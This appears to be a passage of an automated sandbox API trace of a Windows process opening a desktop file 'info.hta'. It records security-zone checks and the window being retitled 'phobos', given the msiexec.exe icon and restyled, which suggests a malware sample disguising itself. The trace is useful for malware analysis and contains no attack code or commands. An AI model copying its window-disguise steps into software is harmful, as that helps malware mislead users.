CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.968] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.968] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76340000 [0226.968] GetProcAddress (hModule=0x76340000, lpProcName="VariantClear") returned 0x76343eae [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.969] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.970] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0226.971] GetCurrentThreadId () returned 0x390 [0226.971] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x24) returned 0x4b12d0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] GetCurrentThreadId () returned 0x390 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.006] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] GetCurrentThreadId () returned 0x390 [0227.007] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0227.007] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x18) returned 0x4e30e0 [0227.007] CreateUri (in: pwzURI="msiexec.exe", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d660 | out: ppURI=0x41d660*=0x49bfa4) returned 0x0 [0227.007] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41d4f0 | out: ppu=0x41d4f0) returned 0x0 [0227.007] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d5ac | out: ppURI=0x41d5ac*=0x49c07c) returned 0x0 [0227.007] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d574 | out: ppvObject=0x41d574*=0x49c07c) returned 0x0 [0227.007] IUnknown:Release (This=0x49c07c) returned 0xb [0227.007] IUnknown:AddRef (This=0x49c07c) returned 0xc [0227.015] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x49bfa4, dwCombineFlags=0x6000000, ppCombinedUri=0x41d5e0, dwReserved=0x0 | out: ppCombinedUri=0x41d5e0*=0x49cfac) returned 0x0 [0227.016] IUnknown:Release (This=0x49c07c) returned 0xc [0227.016] IUnknown:Release (This=0x49c07c) returned 0xb [0227.016] IUnknown:QueryInterface (in: This=0x49cfac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d534 | out: ppvObject=0x41d534*=0x49cfac) returned 0x0 [0227.017] IUnknown:Release (This=0x49cfac) returned 0x2 [0227.017] IUnknown:AddRef (This=0x49cfac) returned 0x3 [0227.017] IUri:GetAbsoluteUri (in: This=0x49cfac, pbstrAbsoluteUri=0x41d528 | out: pbstrAbsoluteUri=0x41d528*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/msiexec.exe") returned 0x0 [0227.017] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xcc) returned 0x49d078 [0227.017] IUnknown:AddRef (This=0x49cfac) returned 0x4 [0227.017] IUnknown:QueryInterface (in: This=0x49cfac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d504 | out: ppvObject=0x41d504*=0x49cfac) returned 0x0 [0227.017] IUnknown:Release (This=0x49cfac) returned 0x4 [0227.017] IUnknown:AddRef (This=0x49cfac) returned 0x5 [0227.017] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20) returned 0x4e7738 [0227.017] IUnknown:Release (This=0x49cfac) returned 0x4 [0227.017] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x3c) returned 0x4beda8 [0227.017] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x4bcd30 [0227.017] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d4b0 | out: phkResult=0x41d4b0*=0x174) returned 0x0 [0227.017] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d4b4 | out: phkResult=0x41d4b4*=0x1bc) returned 0x0 [0227.017] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x41d470 | out: phkResult=0x41d470*=0x0) returned 0x2 [0227.018] RegOpenKeyExW (in: hKey=0x174, lpSubKey="FEATURE_SUBDOWNLOAD_LOCKDOWN", ulOptions=0x0, samDesired=0x1, phkResult=0x41d470 | out: phkResult=0x41d470*=0x124) returned 0x0 [0227.018] SHRegGetValueW () returned 0x2 [0227.018] SHRegGetValueW () returned 0x2 [0227.018] RegCloseKey (hKey=0x124) returned 0x0 [0227.018] RegCloseKey (hKey=0x0) returned 0x6 [0227.018] RegCloseKey (hKey=0x0) returned 0x6 [0227.018] RegCloseKey (hKey=0x174) returned 0x0 [0227.018] RegCloseKey (hKey=0x1bc) returned 0x0 [0227.018] IInternetSecurityManager:MapUrlToZone (in: This=0x4a2880, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41d540, dwFlags=0x0 | out: pdwZone=0x41d540*=0x0) returned 0x0 [0227.018] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1b0) returned 0x4e0b88 [0227.018] IUnknown:QueryInterface (in: This=0x49cfac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d23c | out: ppvObject=0x41d23c*=0x49cfac) returned 0x0 [0227.018] IUnknown:Release (This=0x49cfac) returned 0x4 [0227.018] IUnknown:AddRef (This=0x49cfac) returned 0x5 [0227.018] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/msiexec.exe", ppu=0x41d200 | out: ppu=0x41d200) returned 0x0 [0227.018] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x78) returned 0x482668 [0227.018] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x78) returned 0x4827e8 [0227.019] CoInternetParseUrl (in: pwzUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/msiexec.exe", ParseAction=0x13, dwFlags=0x0, pszResult=0x4827e8, cchResult=0x3c, pcchResult=0x41d20c, dwReserved=0x0 | out: pszResult="file:///C:/Users/5p5NrGJn0jS HALPmcxz/Desktop/msiexec.exe", pcchResult=0x41d20c) returned 0x0 [0227.019] CoInternetParseUrl (in: pwzUrl="file:///C:/Users/5p5NrGJn0jS HALPmcxz/Desktop/msiexec.exe", ParseAction=0x9, dwFlags=0x0, pszResult=0x482668, cchResult=0x3c, pcchResult=0x41d20c, dwReserved=0x0 | out: pszResult="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\msiexec.exe", pcchResult=0x41d20c) returned 0x0 [0227.019] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4827e8 | out: hHeap=0x470000) returned 1 [0227.019] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x482668 | out: hHeap=0x470000) returned 1 [0227.019] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.019] IUnknown:AddRef (This=0x49cfac) returned 0x6 [0227.019] IUnknown:AddRef (This=0x49cfac) returned 0x7 [0227.019] IUnknown:QueryInterface (in: This=0x49cfac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d230 | out: ppvObject=0x41d230*=0x49cfac) returned 0x0 [0227.019] IUnknown:Release (This=0x49cfac) returned 0x7 [0227.019] IUnknown:AddRef (This=0x49cfac) returned 0x8 [0227.019] IUri:GetScheme (in: This=0x49cfac, pdwScheme=0x4e0c90 | out: pdwScheme=0x4e0c90*=0x9) returned 0x0 [0227.019] CoInternetParseIUri (in: pIUri=0x49cfac, ParseAction=0x9, dwFlags=0x0, pwzResult=0x41d2a8, cchResult=0x104, pcchResult=0x41d24c, dwReserved=0x0 | out: pwzResult="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\msiexec.exe", pcchResult=0x41d24c) returned 0x0 [0227.019] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x68) returned 0x4c2a48 [0227.019] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\msiexec.exe", lpFindFileData=0x41cfd8 | out: lpFindFileData=0x41cfd8) returned 0xffffffff [0227.019] IUnknown:QueryInterface (in: This=0x49cfac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d23c | out: ppvObject=0x41d23c*=0x49cfac) returned 0x0 [0227.019] IUnknown:Release (This=0x49cfac) returned 0x8 [0227.019] IUnknown:AddRef (This=0x49cfac) returned 0x9 [0227.019] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4e0878 [0227.019] IInternetSession:CreateBinding (in: This=0x4a3d90, pbc=0x0, szUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/msiexec.exe", pUnkOuter=0x0, ppunk=0x0, ppOInetProt=0x4e0880, dwOption=0x0 | out: ppunk=0x0, ppOInetProt=0x4e0880*=0x4b1908) returned 0x0 [0227.019] IUnknown:QueryInterface (in: This=0x4b1908, riid=0x74096078*(Data1=0x53c84785, Data2=0x8425, Data3=0x4dc5, Data4=([0]=0x97, [1]=0x1b, [2]=0xe5, [3]=0x8d, [4]=0x9c, [5]=0x19, [6]=0xf9, [7]=0xb6)), ppvObject=0x41d1c0 | out: ppvObject=0x41d1c0*=0x0) returned 0x80004002 [0227.019] IUnknown:QueryInterface (in: This=0x4b1908, riid=0x74096068*(Data1=0x79eac9eb, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x41d1d0 | out: ppvObject=0x41d1d0*=0x4b1918) returned 0x0 [0227.020] IInternetPriority:SetPriority (This=0x4b1918, nPriority=-1) returned 0x0 [0227.020] IUnknown:Release (This=0x4b1918) returned 0x1 [0227.020] IUnknown:AddRef (This=0x4b1908) returned 0x2 [0227.020] IUnknown:QueryInterface (in: This=0x4b1908, riid=0x74096158*(Data1=0xc7a98e66, Data2=0x1010, Data3=0x492c, Data4=([0]=0xa1, [1]=0xc8, [2]=0xc8, [3]=0x9, [4]=0xe1, [5]=0xf7, [6]=0x59, [7]=0x5)), ppvObject=0x41d204 | out: ppvObject=0x41d204*=0x4b1908) returned 0x0 [0227.020] IInternetProtocolEx:StartEx (This=0x4b1908, pUri=0x49cfac, pOIProtSink=0x4e0bdc, pOIBindInfo=0x4e0ba4, grfPI=0x10, dwReserved=0x0) returned 0x800c0005 [0227.020] IUnknown:AddRef (This=0x4e0bdc) returned 0x3 [0227.020] IUnknown:AddRef (This=0x4e0ba4) returned 0x4 [0227.020] IUnknown:QueryInterface (in: This=0x4e0ba4, riid=0x75326f40*(Data1=0xa3e015b7, Data2=0xa82c, Data3=0x4dcd, Data4=([0]=0xa1, [1]=0x50, [2]=0x56, [3]=0x9a, [4]=0xee, [5]=0xed, [6]=0x36, [7]=0xab)), ppvObject=0x41d1ac | out: ppvObject=0x41d1ac*=0x0) returned 0x80004002 [0227.020] IInternetBindInfo:GetBindInfo (in: This=0x4e0ba4, grfBINDF=0x4b1a78, pbindinfo=0x4b1a80 | out: grfBINDF=0x4b1a78*=0x20083, pbindinfo=0x4b1a80) returned 0x0 [0227.020] IUnknown:AddRef (This=0x4e0bdc) returned 0x5 [0227.020] IInternetProtocolSink:ReportProgress (This=0x4e0bdc, ulStatusCode=0x1e, szStatusText=0x0) returned 0x0 [0227.020] IInternetProtocolSink:ReportProgress (This=0x4e0bdc, ulStatusCode=0xb, szStatusText="") returned 0x0 [0227.020] IInternetProtocolSink:ReportResult (This=0x4e0bdc, hrResult=0x800c0005, dwError=0x2, szResult=0x0) returned 0x0 [0227.020] IInternetProtocolRoot:Terminate (This=0x4b1908, dwOptions=0x0) returned 0x0 [0227.020] IUnknown:Release (This=0x4e0ba4) returned 0x4 [0227.020] IUnknown:Release (This=0x4e0bdc) returned 0x3 [0227.020] IUnknown:Release (This=0x4e0bdc) returned 0x2 [0227.021] IUnknown:Release (This=0x4b1908) returned 0x2 [0227.021] IUnknown:Release (This=0x49cfac) returned 0xa [0227.021] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.021] GetIUriPriv () returned 0x0 [0227.021] IUnknown:Release (This=0x49c22c) returned 0x3 [0227.021] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.021] IUnknown:Release (This=0x49cfac) returned 0x9 [0227.021] IUnknown:Release (This=0x49cfac) returned 0x8 [0227.021] CoTaskMemFree (pv=0x0) [0227.021] GetCurrentThreadId () returned 0x390 [0227.021] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.021] GetIUriPriv () returned 0x0 [0227.021] IUnknown:Release (This=0x49c22c) returned 0x3 [0227.021] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.021] IUnknown:Release (This=0x49cfac) returned 0x7 [0227.021] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.022] IUnknown:Release (This=0x4b1908) returned 0x1 [0227.022] IUnknown:Release (This=0x4b1908) returned 0x0 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e0878 | out: hHeap=0x470000) returned 1 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.022] IUnknown:Release (This=0x49cfac) returned 0x4 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4c2a48 | out: hHeap=0x470000) returned 1 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e0b88 | out: hHeap=0x470000) returned 1 [0227.022] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4bcd30 | out: hHeap=0x470000) returned 1 [0227.022] IUnknown:Release (This=0x49cfac) returned 0x3 [0227.022] IUnknown:Release (This=0x49bfa4) returned 0x2 [0227.022] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c) returned 0x4e7788 [0227.022] GetWindowTextW (in: hWnd=0x20156, lpString=0x41c790, nMaxCount=512 | out: lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\info.hta") returned 46 [0227.022] NtdllDefWindowProc_W () returned 0x2e [0227.022] SetWindowTextW (hWnd=0x20156, lpString="phobos") returned 1 [0227.022] NtdllDefWindowProc_W () returned 0x1 [0227.022] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75450000 [0227.023] GetProcAddress (hModule=0x75450000, lpProcName="ExtractIconW") returned 0x7555dd1c [0227.023] ExtractIconW (hInst=0xb40000, lpszExeFileName="msiexec.exe", nIconIndex=0x0) returned 0x1018f [0227.191] SendMessageW (hWnd=0x2016e, Msg=0x80, wParam=0x1, lParam=0x1018f) returned 0x0 [0227.191] NtdllDefWindowProc_W () returned 0x0 [0227.204] NtdllDefWindowProc_W () returned 0x0 [0227.205] NtdllDefWindowProc_W () returned 0x0 [0227.205] SendMessageW (hWnd=0x20156, Msg=0x80, wParam=0x0, lParam=0x1018f) returned 0x0 [0227.205] NtdllDefWindowProc_W () returned 0x0 [0227.205] SetWindowLongW (hWnd=0x20156, nIndex=-16, dwNewLong=13041664) returned -2033254400 [0227.205] NtdllDefWindowProc_W () returned 0x0 [0227.206] NtdllDefWindowProc_W () returned 0x0 [0227.262] SetWindowLongW (hWnd=0x20156, nIndex=-20, dwNewLong=262144) returned 262400 [0227.262] NtdllDefWindowProc_W () returned 0x0 [0227.262] NtdllDefWindowProc_W () returned 0x0 [0227.263] SetWindowPos (hWnd=0x20156, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.263] GlobalAddAtomW (lpString=0x0) returned 0x0 [0227.263] SetPropW (hWnd=0x2016e, lpString=0x0, hData=0x2016e) returned 0 [0227.263] ShowWindow (hWnd=0x20156, nCmdShow=1) returned 0 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.263] NtdllDefWindowProc_W () returned 0x0 [0227.266] NtdllDefWindowProc_W () returned 0x0 [0227.266] NtdllDefWindowProc_W () returned 0x1 [0227.267] NtdllDefWindowProc_W () returned 0x0 [0227.267] GetClientRect (in: hWnd=0x20156, lpRect=0x41d478 | out: lpRect=0x41d478) returned 1 [0227.267] GetClientRect (in: hWnd=0x20156, lpRect=0x41d478 | out: lpRect=0x41d478) returned 1 [0227.267] NtdllDefWindowProc_W () returned 0x0 [0227.267] UpdateWindow (hWnd=0x20156) [0227.267] NtdllDefWindowProc_W () returned 0x0 [0227.267] GetWindowLongW (hWnd=0x30198, nIndex=-21) returned 4856120 [0227.281] SetBrushOrgEx (in: hdc=0xab0101eb, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.281] Polygon (hdc=0xab0101eb, apt=0x41a098, cpt=6) returned 1 [0227.281] SetBrushOrgEx (in: hdc=0xab0101eb, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=0, nDenominator=2) returned 0 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.281] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.282] Polygon (hdc=0xab0101eb, apt=0x41a098, cpt=8) returned 1 [0227.282] SetBrushOrgEx (in: hdc=0xab0101eb, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.282] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.282] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.282] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.282] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.282] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.282] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.282] Polygon (hdc=0xab0101eb, apt=0x41a098, cpt=6) returned 1 [0227.282] SetBrushOrgEx (in: hdc=0xab0101eb, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0227.283] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.283] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.283] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.283] MulDiv (nNumber=2, nNumerator=1, nDenominator=2) returned 1 [0227.283] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.283] MulDiv (nNumber=2, nNumerator=2, nDenominator=2) returned 2 [0227.283] Polygon (hdc=0xab0101eb, apt=0x41a098, cpt=8) returned 1 [0227.283] SelectObject (hdc=0xab0101eb, h=0x1900010) returned 0x510070c [0227.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae640 [0227.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4e08a8 [0227.324] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4e0800, Size=0x18) returned 0x4e3240 [0227.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4ae5e8 [0227.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x800) returned 0x4aaac0 [0227.324] GetTickCount () returned 0x20bd2 [0227.324] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0227.324] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x50) returned 0x4aeb10 [0227.324] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f700 | out: ppu=0x41f700) returned 0x0 [0227.324] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.324] IInternetSecurityManager:MapUrlToZone (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41f6a4, dwFlags=0x0 | out: pdwZone=0x41f6a4*=0xffffffff) returned 0x800c0011 [0227.324] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.324] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.324] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0227.325] IInternetSecurityManager:ProcessUrlAction (in: This=0x744796bc, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwAction=0x1400, pPolicy=0x41f6a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x41f6a8*=0x0) returned 0x0 [0227.325] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0227.325] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.325] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4e08a8 | out: hHeap=0x470000) returned 1 [0227.325] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4e0818, Size=0x18) returned 0x4e3260 [0227.325] GetTickCount () returned 0x20bd2 [0227.325] GetTickCount () returned 0x20bd2 [0227.325] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41f8b8 | out: ppu=0x41f8b8) returned 0x0 [0227.325] IUnknown:AddRef (This=0x49c22c) returned 0x3 [0227.325] IUri:GetAbsoluteUri (in: This=0x49c22c, pbstrAbsoluteUri=0x41f938 | out: pbstrAbsoluteUri=0x41f938*="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta") returned 0x0 [0227.325] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.325] ShouldShowIntranetWarningSecband () returned 0x0 [0227.334] GetIUriPriv () returned 0x0 [0227.334] IUnknown:Release (This=0x49c22c) returned 0x2 [0227.334] GetCursorPos (in: lpPoint=0x41f730 | out: lpPoint=0x41f730*(x=449, y=50)) returned 1 [0227.334] ScreenToClient (in: hWnd=0x30198, lpPoint=0x41f730 | out: lpPoint=0x41f730) returned 1 [0227.334] GetKeyState (nVirtKey=16) returned 0 [0227.334] GetKeyState (nVirtKey=17) returned 0 [0227.334] GetKeyState (nVirtKey=18) returned 0 [0227.334] GetKeyState (nVirtKey=160) returned 0 [0227.334] GetKeyState (nVirtKey=162) returned 0 [0227.334] GetKeyState (nVirtKey=164) returned 0 [0227.335] RtlAllocateHeap 